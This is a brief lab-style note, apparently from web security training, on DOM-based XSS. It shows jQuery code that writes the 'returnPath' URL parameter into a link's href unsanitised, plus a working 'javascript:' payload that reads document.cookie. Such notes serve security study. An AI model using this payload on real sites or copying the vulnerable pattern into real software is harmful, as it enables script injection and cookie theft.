DOM XSS in jQuery anchor `href` attribute sink using `location.search` source ¶

Vulnerable:

$(function() {
  $('#backLink').attr("href", (new URLSearchParams(window.location.search)).get('returnPath'));
});

Payload: /feedback?returnPath=javascript:alert(document.cookie)

DOM XSS in jQuery anchor href attribute sink using location.search source¶